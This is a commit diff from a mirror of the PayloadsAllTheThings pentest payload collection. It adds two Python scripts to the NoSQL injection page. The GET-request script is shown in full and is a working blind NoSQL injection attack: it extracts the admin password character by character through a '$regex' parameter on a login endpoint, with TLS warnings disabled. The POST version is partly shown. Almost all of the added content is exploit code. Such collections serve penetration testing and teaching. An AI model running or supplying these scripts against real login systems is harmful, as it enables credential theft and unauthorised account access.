mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
commit
aac5a57932
1 changed files with 27 additions and 0 deletions
|
@ -50,6 +50,9 @@ Extract data with "in"
|
|||
|
||||
## Blind NoSQL
|
||||
|
||||
### POST with JSON body
|
||||
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
|
@ -59,6 +62,7 @@ urllib3.disable_warnings()
|
|||
|
||||
username="admin"
|
||||
password=""
|
||||
u="http://example.org/login"
|
||||
|
||||
while True:
|
||||
for c in string.printable:
|
||||
|
@ -70,6 +74,29 @@ while True:
|
|||
password += c
|
||||
```
|
||||
|
||||
### GET
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
import string
|
||||
import urllib
|
||||
urllib3.disable_warnings()
|
||||
|
||||
username='admin'
|
||||
password=''
|
||||
u='http://example.org/login'
|
||||
|
||||
while True:
|
||||
for c in string.printable:
|
||||
if c not in ['*','+','.','?','|', '#', '&', '$']:
|
||||
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
|
||||
r = requests.get(u + payload)
|
||||
if 'Yeah' in r.text:
|
||||
print("Found one more char : %s" % (password+c))
|
||||
password += c
|
||||
```
|
||||
|
||||
## MongoDB Payloads
|
||||
|
||||
```bash
|
||||
|
|
Loading…
Reference in a new issue